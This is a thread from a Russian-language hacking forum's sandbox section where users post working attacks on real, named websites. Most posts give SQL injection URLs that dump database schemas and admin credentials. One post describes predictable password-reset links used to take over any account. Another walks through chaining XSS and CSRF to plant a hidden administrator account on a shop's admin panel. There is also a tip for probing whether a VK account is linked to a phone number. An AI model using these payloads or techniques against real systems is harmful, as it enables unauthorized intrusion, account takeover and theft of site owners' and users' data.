HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #121  
Старый 26.04.2016, 16:37
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Саит http://www.francophonie.utm.md/

Уязвимость: SQL Injection

Сплоит http://www.francophonie.utm.md/?mop=...sion(),7,8+--+
 
Ответить с цитированием

  #122  
Старый 26.08.2016, 00:30
MaxxWell
Guest
Сообщений: n/a
Провел на форуме:
9612

Репутация: 0
По умолчанию

Код:
Code:
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+
Тип: SQL Injection.

================================================== ========



Код:
Code:
http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),13,14+--+
Тип:
SQL Ijection (вывод в title, Cntr+u)

================================================== ========



Код:
Code:
http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)+--+




Тип:
SQL Injection
 
Ответить с цитированием

  #123  
Старый 28.08.2016, 23:21
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

ТИЦ:10PR:2

Код:
Code:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
Вывод таблиц:

Код:
Code:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),9,10,11,12,13,14,15,16+--+
Вывод админа:

Код:
Code:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0x3,username,password),9,10,11,12,13,14,15,16+from+heterodrugs.users+--+
Version (5.5.49-cll-lve)

Database (heterodrugs)

User (hetero582016@localhost)


Для простоты действий:

ttp://heteroworld.com/cpanel/

ttp://heteroworld.com/info.php


P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)
 
Ответить с цитированием

  #124  
Старый 14.09.2016, 00:02
PoliGroS
Guest
Сообщений: n/a
Провел на форуме:
14367

Репутация: 0
По умолчанию

Цитата:
Сообщение от MaxxWell  
MaxxWell said:

Код:
Code:
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+
Тип:
SQL Injection.
Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.
 
Ответить с цитированием

  #125  
Старый 26.03.2017, 13:12
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт

Код:
Code:
https://www.andys.md/ro/pages/login/
http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/
 
Ответить с цитированием

  #126  
Старый 03.08.2017, 15:14
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )

При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора

Код:
Code:
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)

Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит

Код:
Code:

   
     
       tr:last-child{display:none;}">
Почему в логине

Код:
Code:
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице

Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так

Код:
Code:

  location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке



После этого была оповещена администрация которая на 2 день профиксела
 
Ответить с цитированием

  #127  
Старый 03.08.2017, 21:15
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора
Код:
Code:
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит
Код:
Code:

   
     
       tr:last-child{display:none;}">
Почему в логине
Код:
Code:
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так
Код:
Code:

  location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке

После этого была оповещена администрация которая на 2 день профиксела
Очень хорошая демонстрация, как XSS и CSRF на практике применяется.
 
Ответить с цитированием

  #128  
Старый 29.08.2017, 21:05
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Раскрытие данных

Код:
Code:
http://www.termosuport.md/admin/
 
Ответить с цитированием

  #129  
Старый 17.09.2017, 11:51
tro0st
Guest
Сообщений: n/a
Провел на форуме:
3589

Репутация: 0
По умолчанию

Цитата:
Сообщение от Erpeitupoi  
Erpeitupoi said:

Приветствую форумчане, подскажите пожалуйста нубу, можно ли как-то узнать привязана ли к номеру телефона страница в вк? Соррян за оффтоп, пока не могу отвечать в теме "В контакте".
Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.
 
Ответить с цитированием

  #130  
Старый 17.09.2017, 22:56
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Будь осторожен с этим.

Зачем
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ